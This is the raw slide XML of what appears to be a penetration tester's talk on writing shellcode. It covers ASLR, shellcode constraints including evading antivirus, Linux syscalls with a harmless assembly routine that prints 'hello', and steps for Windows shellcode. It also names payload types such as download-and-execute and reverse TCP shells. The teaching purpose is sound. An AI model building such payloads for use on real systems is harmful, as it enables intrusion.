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4" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId5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3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A2951-76AA-AB48-87F6-30587CD982D0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1BEC8-D6E1-AB41-B1D0-F0A93D5B0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07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9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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D374C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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D374C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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D374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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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7984" y="-463609"/>
            <a:ext cx="12192000" cy="536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01041" y="994834"/>
            <a:ext cx="10028767" cy="18906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5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5867" dirty="0" smtClean="0"/>
              <a:t>Edit Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="5867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11200" y="3048000"/>
            <a:ext cx="6462184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Subtitle/Author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001" y="5839358"/>
            <a:ext cx="2450591" cy="73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3799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te Gray Solid Divider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001" y="5839358"/>
            <a:ext cx="2450591" cy="73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9398400" y="6163201"/>
            <a:ext cx="2582400" cy="411335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endParaRPr lang="en-US" sz="2667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2"/>
            <a:ext cx="12192000" cy="657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89281" y="2320868"/>
            <a:ext cx="9134535" cy="1994392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AAAAAA">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5867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93061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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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te Gray Single Column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192000" cy="1117600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endParaRPr lang="en-US" sz="2667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704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="-2445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60" y="1717040"/>
            <a:ext cx="10565848" cy="425704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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Museo Sans For Dell" pitchFamily="2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867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40361" y="325120"/>
            <a:ext cx="10574127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33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93701" y="1126914"/>
            <a:ext cx="10579100" cy="488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11374567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Gray Solid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001" y="5839358"/>
            <a:ext cx="2450591" cy="73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9398400" y="6163201"/>
            <a:ext cx="2582400" cy="411335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endParaRPr lang="en-US" sz="2667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1"/>
            <a:ext cx="12192000" cy="6574535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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38481" y="2331028"/>
            <a:ext cx="9134535" cy="1994392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5867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49015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Gray One Column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192000" cy="1117600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endParaRPr lang="en-US" sz="2667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704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="-2445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60" y="1717040"/>
            <a:ext cx="10565848" cy="425704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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Museo Sans For Dell" pitchFamily="2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867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40361" y="325120"/>
            <a:ext cx="10574127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33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93701" y="1126914"/>
            <a:ext cx="10579100" cy="488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18233180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lue Solid Divider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001" y="5839358"/>
            <a:ext cx="2450591" cy="73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9398400" y="6163201"/>
            <a:ext cx="2582400" cy="411335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060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endParaRPr lang="en-US" sz="2667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12192000" cy="657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431804"/>
            <a:ext cx="9134535" cy="1994392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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73312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lue One Column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192000" cy="1117600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endParaRPr lang="en-US" sz="2667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704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="7715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60" y="1717040"/>
            <a:ext cx="10565848" cy="425704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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Museo Sans For Dell" pitchFamily="2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867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40361" y="325120"/>
            <a:ext cx="10574127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33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93701" y="1126914"/>
            <a:ext cx="10579100" cy="488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17009049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te Blue Solid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001" y="5839358"/>
            <a:ext cx="2450591" cy="73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9398400" y="6163201"/>
            <a:ext cx="2582400" cy="41133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endParaRPr lang="en-US" sz="2667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8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12192000" cy="657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79121" y="2331028"/>
            <a:ext cx="9134535" cy="199439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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5867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222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te Blue Single Column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192000" cy="111760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endParaRPr lang="en-US" sz="2667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704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="-12605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60" y="1717040"/>
            <a:ext cx="10565848" cy="425704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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Museo Sans For Dell" pitchFamily="2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867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40361" y="325120"/>
            <a:ext cx="10574127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33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93701" y="1126914"/>
            <a:ext cx="10579100" cy="488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21422962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 Solid Divi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10162"/>
            <a:ext cx="12192000" cy="6564373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001" y="5839358"/>
            <a:ext cx="2450591" cy="73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9398400" y="6163201"/>
            <a:ext cx="2582400" cy="411335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endParaRPr lang="en-US" sz="2667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99441" y="2331028"/>
            <a:ext cx="9134535" cy="1994392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5867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26957"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med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 One Column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192000" cy="1117600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endParaRPr lang="en-US" sz="2667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704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="-2445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60" y="1717040"/>
            <a:ext cx="10565848" cy="425704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chemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Museo Sans For Dell" pitchFamily="2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867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40361" y="325120"/>
            <a:ext cx="10574127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33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93701" y="1126914"/>
            <a:ext cx="10579100" cy="488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5525679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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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871-F271-CB46-B3BF-566AC20E1517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C8F7-9353-394E-92F8-C13B20D37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19A2871-F271-CB46-B3BF-566AC20E1517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94C8F7-9353-394E-92F8-C13B20D37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  <p:sldLayoutId id="2147484147" r:id="rId13"/>
    <p:sldLayoutId id="2147484148" r:id="rId14"/>
    <p:sldLayoutId id="2147484149" r:id="rId15"/>
    <p:sldLayoutId id="2147484150" r:id="rId16"/>
    <p:sldLayoutId id="2147484151" r:id="rId17"/>
    <p:sldLayoutId id="2147484152" r:id="rId18"/>
    <p:sldLayoutId id="2147484153" r:id="rId19"/>
    <p:sldLayoutId id="2147484154" r:id="rId20"/>
    <p:sldLayoutId id="2147484155" r:id="rId21"/>
    <p:sldLayoutId id="2147484156" r:id="rId22"/>
    <p:sldLayoutId id="2147484157" r:id="rId23"/>
    <p:sldLayoutId id="2147484158" r:id="rId24"/>
    <p:sldLayoutId id="2147484159" r:id="rId25"/>
    <p:sldLayoutId id="2147484160" r:id="rId26"/>
    <p:sldLayoutId id="2147484161" r:id="rId27"/>
    <p:sldLayoutId id="2147484162" r:id="rId2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4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hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/ff818516(v=vs.85).aspx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desktop/dd374081(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/dd374089(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout28.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/dd317752(v=vs.85).aspx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hyperlink" Target="https://github.com/NytroRST/ShellcodeCompiler" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nickharbour.wordpress.com/2010/07/01/writing-shellcode-with-a-c-compiler/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/articles/windows-syscall-shellcode" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.didierstevens.com/programs/shellcode/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.msreverseengineering.com/blog/2016/11/8/synesthesia-modern-shellcode-synthesis-ekoparty-2016-talk" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://defuse.ca/online-x86-assembler.htm" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/shellcode/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Shellcode" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Sockets-Shellcode-Porting-Coding-Professionals/dp/1597490059" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hick.org/code/skape/papers/win32-shellcode.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/62/7.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/57/15.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mcdermottcybersecurity.com/articles/windows-x64-shellcode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hyperlink" Target="http://www.nasm.u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01041" y="774981"/>
            <a:ext cx="10028767" cy="189060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Athelas" charset="0"/>
                <a:ea typeface="Athelas" charset="0"/>
                <a:cs typeface="Athelas" charset="0"/>
              </a:rPr>
              <a:t>Windows shellcodes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Athelas" charset="0"/>
                <a:ea typeface="Athelas" charset="0"/>
                <a:cs typeface="Athelas" charset="0"/>
              </a:rPr>
              <a:t>To be continued</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0">
                <a:latin typeface="Athelas" charset="0"/>
                <a:ea typeface="Athelas" charset="0"/>
                <a:cs typeface="Athelas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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01041" y="3376246"/>
            <a:ext cx="8982440" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Ionut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Popescu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Senior Penetration Tester @ SecureWorks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5787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structure of a process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128" y="1572949"/>
            <a:ext cx="7192789" cy="469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033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ASLR - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address space layout randomization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" y="1442566"/>
            <a:ext cx="3875277" cy="47956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81358" y="2131275"/>
            <a:ext cx="7324505" cy="351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Address space layout randomization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(ASLR) is a computer security technique involved in protection from buffer overflow attacks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. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just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In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order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.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670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Shellcode limitations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360" y="1675238"/>
            <a:ext cx="11195147" cy="234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667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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- Difficult (may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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be really </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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complicated to write your own shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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- NULL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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free (may not contain a NULL character – most common)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667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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- Small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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size (may have a limited space to run)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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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- Alphanumeric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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(may need to be alphanumeric)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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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- Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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(may be detected by antivirus or IDS/IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50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715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431804"/>
            <a:ext cx="10374922" cy="1994392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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcodes on Linux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9793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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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syscalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Execve sysca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0022" y="3466903"/>
            <a:ext cx="4799037" cy="2549488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Calling sysc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47534" y="3466904"/>
            <a:ext cx="4217575" cy="25410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1547" y="1178561"/>
            <a:ext cx="12020452" cy="2373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0x80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is the assembly language instruction that is used to invoke system calls in Linux on x86 (i.e., Intel-compatible) processors. </a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO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	Each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process starts out in user mode. When a process makes a system call, it causes the CPU to switch temporarily into kernel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mode. When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the kernel has satisfied the process's request, it restores the process to user mode.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endParaRPr lang="en-US" sz="2400" dirty="0" err="1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6022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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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syscalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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ro-RO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examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Linux syscall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58722" y="1307513"/>
            <a:ext cx="7594991" cy="46955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5417" y="6132018"/>
            <a:ext cx="1026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chemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Syscall – Kernel API (interface between usermode and kernelmode)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9419112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0361" y="290285"/>
            <a:ext cx="10574127" cy="853440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1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361" y="1545126"/>
            <a:ext cx="6696223" cy="411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jmp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short ender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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starter:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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67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xor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67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eax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67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eax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 ;clean up the registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867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xor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67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ebx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67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ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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67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xor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67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edx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67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edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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67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xor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67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ecx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67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ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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67" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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67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mov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al, 4       ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1867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syscall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write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867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mov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67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bl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, 1       ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1867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stdout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is 1</a:t>
            </a:r>
          </a:p>
          <a:p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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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67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ecx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     ;get the address of the </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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             ;string 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from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867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mov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dl, 5       ;length of the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867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0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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4925" y="2263269"/>
            <a:ext cx="5627076" cy="267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xor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867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eax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67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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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67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mov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al, 1    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exit the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867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xor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867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ebx,ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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67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ro-RO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0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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ender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call starter ;put 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the address of </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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         ;the 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string on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867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db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67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'hello'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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8536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Windows shellcodes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412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0623" y="1422401"/>
            <a:ext cx="9753600" cy="460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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Find kernel32.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Find GetProcAddress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Find LoadLibrary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Load DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667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o-RO" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667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o-RO" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667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o-RO" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DLLs</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189"/>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Common shellcodes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>calc.exe (WinExec)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Download and execute (URLDownloadToFileA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MessageBox (user32.dll)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse TCP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667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ro-RO" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a:r>
            <a:r>
